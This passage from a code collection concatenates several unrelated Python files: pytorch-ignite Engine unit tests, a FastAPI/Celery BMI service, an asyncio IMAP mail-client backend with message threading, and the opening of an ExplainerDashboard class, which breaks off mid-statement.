>= (sleep_time * epoch_length + extra_sleep_time) * max_epochs + extra_sleep_time
)
_test(list(range(100)), max_epochs=2, epoch_length=100)
_test(list(range(200)), max_epochs=2, epoch_length=100)
_test(list(range(200)), max_epochs=5, epoch_length=100)
def _test_check_triggered_events(data, max_epochs, epoch_length, exp_iter_stops=None):
engine = Engine(lambda e, b: 1)
events = [
Events.STARTED,
Events.EPOCH_STARTED,
Events.ITERATION_STARTED,
Events.ITERATION_COMPLETED,
Events.EPOCH_COMPLETED,
Events.COMPLETED,
Events.GET_BATCH_STARTED,
Events.GET_BATCH_COMPLETED,
Events.DATALOADER_STOP_ITERATION,
]
handlers = {e: MagicMock() for e in events}
for e, handler in handlers.items():
engine.add_event_handler(e, handler)
engine.run(data, max_epochs=max_epochs, epoch_length=epoch_length)
expected_num_calls = {
Events.STARTED: 1,
Events.COMPLETED: 1,
Events.EPOCH_STARTED: max_epochs,
Events.EPOCH_COMPLETED: max_epochs,
Events.ITERATION_STARTED: max_epochs * epoch_length,
Events.ITERATION_COMPLETED: max_epochs * epoch_length,
Events.GET_BATCH_STARTED: max_epochs * epoch_length,
Events.GET_BATCH_COMPLETED: max_epochs * epoch_length,
Events.DATALOADER_STOP_ITERATION: (max_epochs - 1) if exp_iter_stops is None else exp_iter_stops,
}
for n, handler in handlers.items():
assert handler.call_count == expected_num_calls[n], f"{n}: {handler.call_count} vs {expected_num_calls[n]}"
def _test_run_check_triggered_events():
# tests issue https://github.com/pytorch/ignite/issues/818
_test_check_triggered_events(list(range(10)), max_epochs=4, epoch_length=10)
_test_check_triggered_events(list(range(100)), max_epochs=5, epoch_length=100)
_test_check_triggered_events(list(range(100)), max_epochs=5, epoch_length=50, exp_iter_stops=50 * 5 // 100)
_test_check_triggered_events(list(range(100)), max_epochs=5, epoch_length=150, exp_iter_stops=150 * 5 // 100)
_test_check_triggered_events(None, max_epochs=5, epoch_length=150)
def test_run_check_triggered_events_list():
_test_run_check_triggered_events()
def _test_run_check_triggered_events_on_iterator():
def infinite_data_iterator():
while True:
for i in range(100):
yield i
_test_check_triggered_events(infinite_data_iterator(), max_epochs=5, epoch_length=100, exp_iter_stops=0)
_test_check_triggered_events(infinite_data_iterator(), max_epochs=5, epoch_length=50, exp_iter_stops=0)
_test_check_triggered_events(infinite_data_iterator(), max_epochs=5, epoch_length=150, exp_iter_stops=0)
def limited_data_iterator():
for i in range(100):
yield i
_test_check_triggered_events(limited_data_iterator(), max_epochs=1, epoch_length=100, exp_iter_stops=0)
_test_check_triggered_events(limited_data_iterator(), max_epochs=10, epoch_length=10, exp_iter_stops=0)
# These tests will fail
with pytest.raises(AssertionError):
with pytest.warns(UserWarning, match=r"Data iterator can not provide data anymore"):
_test_check_triggered_events(limited_data_iterator(), max_epochs=3, epoch_length=100)
with pytest.raises(AssertionError):
with pytest.warns(UserWarning, match=r"Data iterator can not provide data anymore"):
_test_check_triggered_events(limited_data_iterator(), max_epochs=3, epoch_length=75)
with pytest.raises(AssertionError):
with pytest.warns(UserWarning, match=r"Data iterator can not provide data anymore"):
_test_check_triggered_events(limited_data_iterator(), max_epochs=1, epoch_length=101)
def test_run_check_triggered_events_on_iterator():
_test_run_check_triggered_events_on_iterator()
@pytest.mark.distributed
@pytest.mark.skipif(not idist.has_native_dist_support, reason="Skip if no native dist support")
@pytest.mark.skipif(torch.cuda.device_count() < 1, reason="Skip if no GPU")
def test_distrib_nccl_gpu(distributed_context_single_node_nccl):
_test_run_check_triggered_events_on_iterator()
_test_run_check_triggered_events()
@pytest.mark.distributed
@pytest.mark.skipif(not idist.has_native_dist_support, reason="Skip if no native dist support")
def test_distrib_gloo_cpu_or_gpu(distributed_context_single_node_gloo):
_test_run_check_triggered_events_on_iterator()
_test_run_check_triggered_events()
@pytest.mark.multinode_distributed
@pytest.mark.skipif(not idist.has_native_dist_support, reason="Skip if no native dist support")
@pytest.mark.skipif("MULTINODE_DISTRIB" not in os.environ, reason="Skip if not multi-node distributed")
def test_multinode_distrib_gloo_cpu_or_gpu(distributed_context_multi_node_gloo):
_test_run_check_triggered_events_on_iterator()
_test_run_check_triggered_events()
@pytest.mark.multinode_distributed
@pytest.mark.skipif(not idist.has_native_dist_support, reason="Skip if no native dist support")
@pytest.mark.skipif("GPU_MULTINODE_DISTRIB" not in os.environ, reason="Skip if not multi-node distributed")
def test_multinode_distrib_nccl_gpu(distributed_context_multi_node_nccl):
_test_run_check_triggered_events_on_iterator()
_test_run_check_triggered_events()
def test_engine_random_state():
def random_data_generator():
while True:
yield torch.randint(0, 100, size=(5,))
def sum_data(_, batch):
result = torch.sum(batch)
return result
def get_engine():
engine = Engine(sum_data)
average = Average()
average.attach(engine, "average")
return engine
torch.manual_seed(34)
engine = get_engine()
state1 = engine.run(random_data_generator(), max_epochs=2, epoch_length=2)
torch.manual_seed(34)
engine = get_engine()
state2 = engine.run(random_data_generator(), max_epochs=2, epoch_length=2)
torch.manual_seed(42)
engine = get_engine()
state3 = engine.run(random_data_generator(), max_epochs=2, epoch_length=2)
assert state1.metrics["average"] == pytest.approx(state2.metrics["average"])
assert state1.metrics["average"] != pytest.approx(state3.metrics["average"])
assert state2.metrics["average"] != pytest.approx(state3.metrics["average"])
def test_altered_random_state():
# tests issue https://github.com/pytorch/ignite/issues/795
size = 1
def random_train_data_generator(size):
while True:
yield torch.randint(0, 100, size=(size,))
def random_val_data_generator(size):
while True:
yield torch.randint(0, 100, size=(size,)) + 100
train_only_batches = []
def train_fn(_, batch):
train_only_batches.append(batch[0].item())
torch.manual_seed(1)
epoch_length = 6
trainer = Engine(train_fn)
trainer.run(random_train_data_generator(size), max_epochs=4, epoch_length=epoch_length)
def val_fn(_1, _2):
pass
evaluator = Engine(val_fn)
train_batches = []
def train_fn2(_, batch):
train_batches.append(batch[0].item())
trainer = Engine(train_fn2)
@trainer.on(Events.EPOCH_COMPLETED)
@keep_random_state
def run_evaluation(_):
evaluator.run(random_val_data_generator(size), epoch_length=4)
torch.manual_seed(1)
trainer.run(random_train_data_generator(size), max_epochs=4, epoch_length=epoch_length)
for i in range(epoch_length):
assert train_batches[epoch_length + i] != train_batches[2 * epoch_length + i]
assert train_batches[i] == train_only_batches[i]
def test_engine_with_dataloader_no_auto_batching():
# tests https://github.com/pytorch/ignite/issues/941
from torch.utils.data import BatchSampler, DataLoader, RandomSampler
data = torch.rand(64, 4, 10)
data_loader = DataLoader(
data, batch_size=None, sampler=BatchSampler(RandomSampler(data), batch_size=8, drop_last=True)
)
counter = [0]
def foo(e, b):
counter[0] += 1
engine = Engine(foo)
engine.run(data_loader, epoch_length=10, max_epochs=5)
assert counter[0] == 50
def test_run_once_finite_iterator_no_epoch_length():
# FR: https://github.com/pytorch/ignite/issues/871
unknown_size = 11
def finite_unk_size_data_iter():
for i in range(unknown_size):
yield i
bc = BatchChecker(data=list(range(unknown_size)))
engine = Engine(lambda e, b: bc.check(b))
completed_handler = MagicMock()
engine.add_event_handler(Events.COMPLETED, completed_handler)
data_iter = finite_unk_size_data_iter()
engine.run(data_iter)
assert engine.state.epoch == 1
assert engine.state.iteration == unknown_size
assert completed_handler.call_count == 1
def test_run_finite_iterator_no_epoch_length():
# FR: https://github.com/pytorch/ignite/issues/871
unknown_size = 11
def finite_unk_size_data_iter():
for i in range(unknown_size):
yield i
bc = BatchChecker(data=list(range(unknown_size)))
engine = Engine(lambda e, b: bc.check(b))
@engine.on(Events.DATALOADER_STOP_ITERATION)
def restart_iter():
engine.state.dataloader = finite_unk_size_data_iter()
data_iter = finite_unk_size_data_iter()
engine.run(data_iter, max_epochs=5)
assert engine.state.epoch == 5
assert engine.state.iteration == unknown_size * 5
def test_run_finite_iterator_no_epoch_length_2():
# FR: https://github.com/pytorch/ignite/issues/871
known_size = 11
def finite_size_data_iter(size):
for i in range(size):
yield i
bc = BatchChecker(data=list(range(known_size)))
engine = Engine(lambda e, b: bc.check(b))
@engine.on(Events.ITERATION_COMPLETED(every=known_size))
def restart_iter():
engine.state.dataloader = finite_size_data_iter(known_size)
data_iter = finite_size_data_iter(known_size)
engine.run(data_iter, max_epochs=5)
assert engine.state.epoch == 5
assert engine.state.iteration == known_size * 5
def test_faq_inf_iterator_with_epoch_length():
# Code snippet from FAQ
# import torch
torch.manual_seed(12)
def infinite_iterator(batch_size):
while True:
batch = torch.rand(batch_size, 3, 32, 32)
yield batch
def train_step(trainer, batch):
# ...
s = trainer.state
print(f"{s.epoch}/{s.max_epochs} : {s.iteration} - {batch.norm():.3f}")
trainer = Engine(train_step)
# We need to specify epoch_length to define the epoch
trainer.run(infinite_iterator(4), epoch_length=5, max_epochs=3)
assert trainer.state.epoch == 3
assert trainer.state.iteration == 3 * 5
def test_faq_inf_iterator_no_epoch_length():
# Code snippet from FAQ
# import torch
torch.manual_seed(12)
def infinite_iterator(batch_size):
while True:
batch = torch.rand(batch_size, 3, 32, 32)
yield batch
def train_step(trainer, batch):
# ...
s = trainer.state
print(f"{s.epoch}/{s.max_epochs} : {s.iteration} - {batch.norm():.3f}")
trainer = Engine(train_step)
@trainer.on(Events.ITERATION_COMPLETED(once=15))
def stop_training():
trainer.terminate()
trainer.run(infinite_iterator(4))
assert trainer.state.epoch == 1
assert trainer.state.iteration == 15
def test_faq_fin_iterator_unknw_size():
# Code snippet from FAQ
# import torch
torch.manual_seed(12)
def finite_unk_size_data_iter():
for i in range(11):
yield i
def train_step(trainer, batch):
# ...
s = trainer.state
print(f"{s.epoch}/{s.max_epochs} : {s.iteration} - {batch:.3f}")
trainer = Engine(train_step)
@trainer.on(Events.DATALOADER_STOP_ITERATION)
def restart_iter():
trainer.state.dataloader = finite_unk_size_data_iter()
data_iter = finite_unk_size_data_iter()
trainer.run(data_iter, max_epochs=5)
assert trainer.state.epoch == 5
assert trainer.state.iteration == 5 * 11
# Code snippet from FAQ
# import torch
torch.manual_seed(12)
def finite_unk_size_data_iter():
for i in range(11):
yield i
def val_step(evaluator, batch):
# ...
s = evaluator.state
print(f"{s.epoch}/{s.max_epochs} : {s.iteration} - {batch:.3f}")
evaluator = Engine(val_step)
data_iter = finite_unk_size_data_iter()
evaluator.run(data_iter)
assert evaluator.state.epoch == 1
assert evaluator.state.iteration == 1 * 11
def test_faq_fin_iterator():
# Code snippet from FAQ
# import torch
torch.manual_seed(12)
size = 11
def finite_size_data_iter(size):
for i in range(size):
yield i
def train_step(trainer, batch):
# ...
s = trainer.state
print(f"{s.epoch}/{s.max_epochs} : {s.iteration} - {batch:.3f}")
trainer = Engine(train_step)
@trainer.on(Events.ITERATION_COMPLETED(every=size))
def restart_iter():
trainer.state.dataloader = finite_size_data_iter(size)
data_iter = finite_size_data_iter(size)
trainer.run(data_iter, max_epochs=5)
assert trainer.state.epoch == 5
assert trainer.state.iteration == 5 * size
# Code snippet from FAQ
# import torch
torch.manual_seed(12)
size = 11
def finite_size_data_iter(size):
for i in range(size):
yield i
def val_step(evaluator, batch):
# ...
s = evaluator.state
print(f"{s.epoch}/{s.max_epochs} : {s.iteration} - {batch:.3f}")
evaluator = Engine(val_step)
data_iter = finite_size_data_iter(size)
evaluator.run(data_iter)
assert evaluator.state.epoch == 1
assert evaluator.state.iteration == size
def test_set_data():
# tests FR https://github.com/pytorch/ignite/issues/833
from torch.utils.data import DataLoader
num_iters1 = 10
num_iters2 = 20
batch_size = 4
torch.manual_seed(1)
data1 = DataLoader(torch.rand(num_iters1 * batch_size, 11), batch_size=batch_size)
data2 = DataLoader(torch.rand(num_iters2 * batch_size, 22), batch_size=batch_size)
switch_iteration = 35
def train_fn(e, batch):
if e.state.iteration <= switch_iteration:
assert batch.shape[1] == 11, f"{e.state.iteration}: {batch.shape}"
else:
assert batch.shape[1] == 22, f"{e.state.iteration}: {batch.shape}"
trainer = Engine(train_fn)
@trainer.on(Events.ITERATION_COMPLETED(once=switch_iteration))
def switch_dataloader():
trainer.set_data(data2)
trainer.run(data1, max_epochs=10)
def test_run_with_max_iters():
max_iters = 8
engine = Engine(lambda e, b: 1)
engine.run([0] * 20, max_iters=max_iters)
assert engine.state.iteration == max_iters
assert engine.state.max_iters == max_iters
def test_run_with_max_iters_greater_than_epoch_length():
max_iters = 73
engine = Engine(lambda e, b: 1)
engine.run([0] * 20, max_iters=max_iters)
assert engine.state.iteration == max_iters
def test_run_with_invalid_max_iters_and_max_epoch():
max_iters = 12
max_epochs = 2
engine = Engine(lambda e, b: 1)
with pytest.raises(
ValueError,
match=r"Arguments max_iters and max_epochs are mutually exclusive."
"Please provide only max_epochs or max_iters.",
):
engine.run([0] * 20, max_iters=max_iters, max_epochs=max_epochs)
def test_epoch_events_fired():
max_iters = 32
engine = Engine(lambda e, b: 1)
@engine.on(Events.EPOCH_COMPLETED)
def fired_event(engine):
assert engine.state.iteration % engine.state.epoch_length == 0
engine.run([0] * 10, max_iters=max_iters)
def test_is_done_with_max_iters():
state = State(iteration=100, epoch=1, max_epochs=3, epoch_length=100, max_iters=250)
assert not Engine._is_done(state)
state = State(iteration=250, epoch=1, max_epochs=3, epoch_length=100, max_iters=250)
assert Engine._is_done(state)
@pytest.mark.skipif(torch.cuda.device_count() < 1, reason="Skip if no GPU")
def test_batch_is_released_before_new_one_is_loaded_on_cuda():
torch.cuda.empty_cache()
engine = Engine(lambda e, b: None)
def _test():
mem_consumption = []
def dataloader():
for _ in range(4):
mem_consumption.append(torch.cuda.memory_allocated())
batch = torch.randn(10).cuda()
mem_consumption.append(torch.cuda.memory_allocated())
yield batch
engine.run(dataloader(), max_epochs=2, epoch_length=2)
return mem_consumption
mem_consumption1 = _test()
# mem_consumption should look like [0, 512, 512, 512, 512, 512, 512, 512]
assert len(set(mem_consumption1[1:])) == 1
mem_consumption2 = _test()
assert len(set(mem_consumption2[1:])) == 1
assert mem_consumption1 == mem_consumption2
@pytest.mark.skipif(torch.cuda.device_count() < 1, reason="Skip if no GPU")
def test_output_is_released_before_new_one_is_assigned_on_cuda():
torch.cuda.empty_cache()
def _test():
mem_consumption = []
def update_fn(engine, batch):
mem_consumption.append(torch.cuda.memory_allocated())
output = torch.rand(10).cuda()
mem_consumption.append(torch.cuda.memory_allocated())
return output
engine = Engine(update_fn)
engine.run([0, 1], max_epochs=2)
return mem_consumption
mem_consumption1 = _test()
# mem_consumption ~ [0, 512, 0, 512, 0, 512, 0, 512]
assert len(set(mem_consumption1)) == 2
mem_consumption2 = _test()
assert len(set(mem_consumption2)) == 2
assert mem_consumption1 == mem_consumption2
def test_engine_no_data_asserts():
trainer = Engine(lambda e, b: None)
with pytest.raises(ValueError, match=r"epoch_length should be provided if data is None"):
trainer.run(max_epochs=10)
def test_engine_no_data():
def train_step(engine, batch):
assert batch is None
trainer = Engine(train_step)
trainer.run(max_epochs=10, epoch_length=10)
assert trainer.state.iteration == 10 * 10
assert trainer.state.epoch == 10
assert trainer.state.dataloader is None
# continue
trainer.run(max_epochs=20)
assert trainer.state.iteration == 20 * 10
assert trainer.state.epoch == 20
assert trainer.state.dataloader is None
|
the-stack_0_19890 | from typing import Optional, Any
from fastapi import FastAPI
from pydantic import BaseModel
from tasks import celery, calc_bmi
app = FastAPI()
class Body(BaseModel):
weight: float
height: float
class TaskStatus(BaseModel):
id: str
status: Optional[str]
result: Optional[Any]
@app.post('/bmi', response_model=TaskStatus, response_model_exclude_unset=True)
def calculate_bmi(body: Body):
task = calc_bmi.delay(weight=body.weight, height=body.height)
return TaskStatus(id=task.id)
@app.get('/bmi/{task_id}', response_model=TaskStatus)
def check_status(task_id: str):
result = celery.AsyncResult(task_id)
status = TaskStatus(id=task_id, status=result.status, result=result.result)
return status
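# Minimal usage sketch (hypothetical values; assumes a Celery worker is running
# and that tasks.py defines `celery` and `calc_bmi` as imported above):
#   curl -X POST localhost:8000/bmi -H 'Content-Type: application/json' \
#        -d '{"weight": 70.0, "height": 1.75}'
#   curl localhost:8000/bmi/<task_id>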
|
the-stack_0_19891 | import os
import re
import queue
import asyncio
import threading
from mailtk.data import Mailbox, ThreadInfo, Flag, namedtuple
from imapclient import IMAPClient
import email
import imapclient
from mailtk.util import decode_any_header
from mailtk.accounts.base import AccountBase
class ThreadMessage(namedtuple.abc):
_fields = (
'flag', 'size', 'date', 'from_', 'to', 'cc', 'subject',
'message_id', 'references', 'in_reply_to', 'key', 'children')
class MailboxImap(Mailbox):
_fields = 'flags path'
class ThreadInfoImap(ThreadInfo):
_fields = 'mailbox message_key'
def imap_unescape(v):
if v.startswith('"'):
mo = re.match(r'^"(?:[^"\\]|\\")*"$', v)
assert mo
return v[1:-1].replace('\\"', '"')
return v
class ImapAccount(AccountBase):
@classmethod
async def initialize(cls, loop, host, port, username, password, ssl=False):
# TODO: STARTTLS support?
imap = cls(loop, host, int(port), bool(ssl))
await imap.connect()
await imap.backend.login(username, password)
return imap
def __init__(self, loop, host, port, ssl):
self.backend = ImapBackend(loop, host, port, ssl)
async def connect(self):
await self.backend.connect()
async def disconnect(self):
await self.backend.disconnect()
async def capabilities(self):
return await self.backend.capabilities()
def _check_code(self, result):
code, data = result
if code != 'OK':
assert len(data) == 1
raise Exception(data[0].decode())
return data
async def list_folders(self):
mailboxes = {}
children = {}
for flags, delimiter, path in await self.backend.list_folders():
delimiter = (delimiter or b'').decode()
parent, sep, name = path.rpartition(delimiter)
c = children.setdefault(path, [])
m = mailboxes[path] = MailboxImap(
Mailbox(name, c), flags, path)
children.setdefault(parent, []).append(m)
if not any(m.lower() == 'inbox' for m in mailboxes.keys()):
print("Inserting INBOX")
m = mailboxes['INBOX'] = Mailbox('INBOX', [])
children.setdefault('', []).insert(0, m)
return children['']
async def list_messages(self, mailbox):
assert isinstance(mailbox, MailboxImap)
n_messages = await self.backend.select_folder(mailbox.path)
if n_messages == 0:
return []
message_ids = await self.backend.search()
params = [
'FLAGS', 'RFC822.SIZE',
'BODY.PEEK[HEADER.FIELDS (Date From To Cc Subject ' +
'Message-ID References In-Reply-To)]']
data = await self.backend.fetch(message_ids, params)
def parse_flags(imap_flags):
if b'\\Answered' in imap_flags:
return Flag.replied
elif b'\\Seen' in imap_flags:
return Flag.read
elif b'\\Recent' in imap_flags:
return Flag.new
else:
return Flag.unread
def parse(message_key, message_value):
message_value.pop(b'SEQ', None)
flag = parse_flags(message_value.pop(b'FLAGS'))
size = message_value.pop(b'RFC822.SIZE')
(k, message_bytes), = message_value.items()
assert k.startswith(b'BODY')
mime = email.message_from_bytes(message_bytes)
assert isinstance(mime, email.message.Message)
def header(k, d=None):
v = mime[k]
if isinstance(v, email.header.Header):
return str(v)
assert isinstance(v, (str, type(None))), type(v)
return d if v is None else str(decode_any_header(v))
message_id = header('Message-ID')
date_header = header('Date')
return message_id, ThreadMessage(
flag=flag,
size=size,
date=email.utils.parsedate_to_datetime(
date_header) if date_header is not None else None,
from_=header('From'),
to=header('To'),
cc=header('Cc'),
subject=header('Subject'),
message_id=message_id,
references=header('References', '').split(),
in_reply_to=header('In-Reply-To', '').split(),
key=message_key,
children=[],
)
messages = dict(parse(k, v) for k, v in data.items())
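        # Build the thread forest: attach each message to the first parent
        # found via its In-Reply-To/References headers; messages without a
        # known parent become top-level threads.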
toplevel = []
for m in messages.values():
for p in m.in_reply_to + m.references:
try:
messages[p].children.append(m)
break
except KeyError:
pass
else:
toplevel.append(m)
def thread_date(m):
return max([(m.date is not None, m.date and m.date.tzinfo is None, m.date)] +
[thread_date(c) for c in m.children])
toplevel.sort(key=thread_date, reverse=True)
def convert(o: ThreadMessage):
v = ThreadInfo(
flag=o.flag,
size=o.size,
date=o.date,
sender=o.from_,
recipients=', '.join(filter(None, (o.to, o.cc))),
subject=o.subject,
children=[convert(c) for c in o.children],
excerpt='',
)
return ThreadInfoImap(v, mailbox, o.key)
return [convert(t) for t in toplevel]
async def fetch_message(self, threadinfo):
assert isinstance(threadinfo, ThreadInfoImap), type(threadinfo)
# mailbox = threadinfo.mailbox
message_key = threadinfo.message_key
# await self.backend.select_folder(mailbox.path)
params = ['RFC822']
data, = (await self.backend.fetch([message_key], params)).values()
return data[b'RFC822']
class ImapBackend:
BREAK = object()
NOOP = object()
def __init__(self, loop, host, port, ssl):
self._loop = loop
self._host = host
self._port = port
self._ssl = ssl
self._command_queue = queue.Queue()
self._response_queue = queue.Queue()
self._ready_r, self._ready_w = os.pipe()
loop.add_reader(self._ready_r, self._ready)
self._thread = threading.Thread(None, self._run)
self._breaking = False
async def connect(self):
self._thread.start()
async def disconnect(self):
await self.logout()
await self._call(self.BREAK)
self._thread.join()
async def _call(self, method, *args):
if self._breaking:
raise Exception('connection is closing')
future = asyncio.Future(loop=self._loop)
self._command_queue.put_nowait((future, method, args))
if method is self.BREAK:
self._breaking = True
result = await future
if isinstance(result, Exception):
raise result
return result
def _run(self):
# Run commands in thread
if self._ssl:
kwargs = dict(
ssl_context=imapclient.create_default_context())
else:
kwargs = {}
try:
conn = IMAPClient(self._host, self._port, ssl=self._ssl, **kwargs)
except Exception as exn:
future, method, args = self._command_queue.get()
self._response_queue.put((future, exn))
self._command_queue.task_done()
os.write(self._ready_w, b'x')
return
try:
while True:
future, method, args = self._command_queue.get()
if method is self.BREAK:
break
elif method is self.NOOP:
result = None
else:
# TODO check if future is cancelled
try:
result = getattr(conn, method)(*args)
except Exception as exn:
result = exn
# TODO use call_soon_threadsafe instead of _response_queue?
self._response_queue.put((future, result))
self._command_queue.task_done()
os.write(self._ready_w, b'x')
finally:
conn.shutdown()
assert method is self.BREAK
self._response_queue.put((future, None))
self._command_queue.task_done()
os.write(self._ready_w, b'x')
def _ready(self):
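        # Runs on the event loop whenever the worker thread writes a wake-up
        # byte to the pipe: drain the byte, then hand the queued result to
        # the awaiting future.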
os.read(self._ready_r, 1)
future, result = self._response_queue.get_nowait()
if not future.cancelled():
future.set_result(result)
self._response_queue.task_done()
# The following methods were generated by gen-imap.py
async def add_flags(self, messages, flags, silent=False):
'Add *flags* to *messages* in the currently selected folder.'
return await self._call('add_flags', messages, flags, silent)
async def add_gmail_labels(self, messages, labels, silent=False):
'Add *labels* to *messages* in the currently selected folder.'
return await self._call('add_gmail_labels', messages, labels, silent)
async def append(self, folder, msg, flags=(), msg_time=None):
'Append a message to *folder*.'
return await self._call('append', folder, msg, flags, msg_time)
async def capabilities(self):
'Returns the server capability list.'
return await self._call('capabilities')
async def close_folder(self):
'Close the currently selected folder, returning the server'
return await self._call('close_folder')
async def copy(self, messages, folder):
'Copy one or more messages from the current folder to'
return await self._call('copy', messages, folder)
async def create_folder(self, folder):
'Create *folder* on the server returning the server response string.'
return await self._call('create_folder', folder)
async def delete_folder(self, folder):
'Delete *folder* on the server returning the server response string.'
return await self._call('delete_folder', folder)
async def delete_messages(self, messages, silent=False):
'Delete one or more *messages* from the currently selected'
return await self._call('delete_messages', messages, silent)
async def expunge(self):
'Remove any messages from the currently selected folder that'
return await self._call('expunge')
async def fetch(self, messages, data, modifiers=None):
'Retrieve selected *data* associated with one or more'
return await self._call('fetch', messages, data, modifiers)
async def folder_exists(self, folder):
'Return ``True`` if *folder* exists on the server.'
return await self._call('folder_exists', folder)
async def folder_status(self, folder, what=None):
'Return the status of *folder*.'
return await self._call('folder_status', folder, what)
async def get_flags(self, messages):
'Return the flags set for each message in *messages* from'
return await self._call('get_flags', messages)
async def get_gmail_labels(self, messages):
'Return the label set for each message in *messages* in the'
return await self._call('get_gmail_labels', messages)
async def getacl(self, folder):
'Returns a list of ``(who, acl)`` tuples describing the'
return await self._call('getacl', folder)
async def gmail_search(self, query, charset='UTF-8'):
"Search using Gmail's X-GM-RAW attribute."
return await self._call('gmail_search', query, charset)
async def has_capability(self, capability):
'Return ``True`` if the IMAP server has the given *capability*.'
return await self._call('has_capability', capability)
async def id_(self, parameters=None):
'Issue the ID command, returning a dict of server implementation'
return await self._call('id_', parameters)
async def idle(self):
'Put the server into IDLE mode.'
return await self._call('idle')
async def idle_check(self, timeout=None):
'Check for any IDLE responses sent by the server.'
return await self._call('idle_check', timeout)
async def idle_done(self):
'Take the server out of IDLE mode.'
return await self._call('idle_done')
async def list_folders(self, directory='', pattern='*'):
'Get a listing of folders on the server as a list of'
return await self._call('list_folders', directory, pattern)
async def list_sub_folders(self, directory='', pattern='*'):
'Return a list of subscribed folders on the server as'
return await self._call('list_sub_folders', directory, pattern)
async def login(self, username, password):
'Login using *username* and *password*, returning the'
return await self._call('login', username, password)
async def logout(self):
'Logout, returning the server response.'
return await self._call('logout')
async def namespace(self):
'Return the namespace for the account as a (personal, other,'
return await self._call('namespace')
async def noop(self):
'Execute the NOOP command.'
return await self._call('noop')
async def oauth2_login(self, user, access_token, mech='XOAUTH2', vendor=None):
'Authenticate using the OAUTH2 method.'
return await self._call(
'oauth2_login', user, access_token, mech, vendor)
async def oauth_login(self, url, oauth_token, oauth_token_secret, consumer_key='anonymous', consumer_secret='anonymous'):
'Authenticate using the OAUTH method.'
return await self._call(
'oauth_login', url, oauth_token, oauth_token_secret, consumer_key, consumer_secret)
async def plain_login(self, identity, password, authorization_identity=None):
'Authenticate using the PLAIN method (requires server support).'
return await self._call(
'plain_login', identity, password, authorization_identity)
async def remove_flags(self, messages, flags, silent=False):
'Remove one or more *flags* from *messages* in the currently'
return await self._call('remove_flags', messages, flags, silent)
async def remove_gmail_labels(self, messages, labels, silent=False):
'Remove one or more *labels* from *messages* in the'
return await self._call(
'remove_gmail_labels', messages, labels, silent)
async def rename_folder(self, old_name, new_name):
'Change the name of a folder on the server.'
return await self._call('rename_folder', old_name, new_name)
async def search(self, criteria='ALL', charset=None):
'Return a list of messages ids from the currently selected'
return await self._call('search', criteria, charset)
async def select_folder(self, folder, readonly=False):
'Set the current folder on the server.'
return await self._call('select_folder', folder, readonly)
async def set_flags(self, messages, flags, silent=False):
'Set the *flags* for *messages* in the currently selected'
return await self._call('set_flags', messages, flags, silent)
async def set_gmail_labels(self, messages, labels, silent=False):
'Set the *labels* for *messages* in the currently selected'
return await self._call('set_gmail_labels', messages, labels, silent)
async def setacl(self, folder, who, what):
'Set an ACL (*what*) for user (*who*) for a folder.'
return await self._call('setacl', folder, who, what)
async def shutdown(self):
'Close the connection to the IMAP server (without logging out)'
return await self._call('shutdown')
async def sort(self, sort_criteria, criteria='ALL', charset='UTF-8'):
'Return a list of message ids from the currently selected'
return await self._call('sort', sort_criteria, criteria, charset)
async def starttls(self, ssl_context=None):
'Switch to an SSL encrypted connection by sending a STARTTLS command.'
return await self._call('starttls', ssl_context)
async def subscribe_folder(self, folder):
'Subscribe to *folder*, returning the server response string.'
return await self._call('subscribe_folder', folder)
async def thread(self, algorithm='REFERENCES', criteria='ALL', charset='UTF-8'):
'Return a list of messages threads from the currently'
return await self._call('thread', algorithm, criteria, charset)
async def unsubscribe_folder(self, folder):
'Unsubscribe to *folder*, returning the server response string.'
return await self._call('unsubscribe_folder', folder)
async def xlist_folders(self, directory='', pattern='*'):
'Execute the XLIST command, returning ``(flags, delimiter,'
return await self._call('xlist_folders', directory, pattern)
# End generated methods
|
the-stack_0_19892 | # -*- coding: utf-8 -*-
__all__ = ['ExplainerDashboard', 'ExplainerDashboardStandaloneTab',
'ModelSummaryTab']
import dash
import dash_core_components as dcc
import dash_bootstrap_components as dbc
import dash_html_components as html
from dash.dependencies import Input, Output, State
from dash.exceptions import PreventUpdate
import plotly.io as pio
from .dashboard_tabs.dashboard_methods import *
from .dashboard_tabs.model_summary_tab import *
from .dashboard_tabs.contributions_tab import *
from .dashboard_tabs.shap_dependence_tab import *
from .dashboard_tabs.shap_interactions_tab import *
from .dashboard_tabs.decision_trees_tab import *
class ExplainerDashboard:
"""Constructs a dashboard out of an ExplainerBunch object. You can indicate
which tabs to include, and pass kwargs to individual tabs.
"""
def __init__(self, explainer, title='Model Explainer',
tabs=None,
model_summary=True,
contributions=True,
shap_dependence=True,
shap_interaction=True,
decision_trees=True,
plotly_template="none",
**kwargs):
"""Constructs an ExplainerDashboard.
:param explainer: an ExplainerBunch object
:param title: Title of the dashboard, defaults to 'Model Explainer'
:type title: str, optional
:param model_summary: display model_summary tab or not, defaults to True
:type model_summary: bool, optional
:param contributions: display individual contributions tab or not, defaults to True
:type contributions: bool, optional
:param shap_dependence: display shap dependence tab or not, defaults to True
:type shap_dependence: bool, optional
        :param shap_interaction: display shap interaction tab or not, defaults to True
        :type shap_interaction: bool, optional
        :param decision_trees: display tab with individual decision trees of the random forest, defaults to True
:type decision_trees: bool, optional
"""
        self.explainer = explainer
self.title = title
self.model_summary = model_summary
self.contributions = contributions
self.shap_dependence = shap_dependence
self.shap_interaction = shap_interaction
self.decision_trees = decision_trees
self.plotly_template = plotly_template
self.kwargs = kwargs
# calculate lazily loaded properties before starting dashboard:
if shap_dependence or contributions or model_summary:
_ = explainer.shap_values, explainer.preds, explainer.pred_percentiles
if explainer.cats is not None:
_ = explainer.shap_values_cats
if explainer.is_classifier:
_ = explainer.pred_probas
if model_summary:
_ = explainer.permutation_importances
if explainer.cats is not None:
_ = explainer.permutation_importances_cats
if shap_interaction:
try:
_ = explainer.shap_interaction_values
if explainer.cats is not None:
_ = explainer.shap_interaction_values_cats
            except Exception:
                print("Note: calculating shap interaction failed, so turning off interactions tab")
                self.shap_interaction = False
if decision_trees:
if hasattr(self.explainer, 'decision_trees'):
_ = explainer.graphviz_available
_ = explainer.decision_trees
else:
self.decision_trees = False
self.app = dash.Dash(__name__)
        self.app.config['suppress_callback_exceptions'] = True
self.app.css.config.serve_locally = True
self.app.scripts.config.serve_locally = True
self.app.title = title
pio.templates.default = self.plotly_template
# layout
self.title_and_label_selector = TitleAndLabelSelector(explainer, title=title)
self.tabs = [] if tabs is None else tabs
self._insert_tabs()
assert len(self.tabs) > 0, 'need to pass at least one tab! e.g. model_summary=True'
self.tab_layouts = [
dcc.Tab(children=tab.layout(), label=tab.title, id=tab.tab_id, value=tab.tab_id)
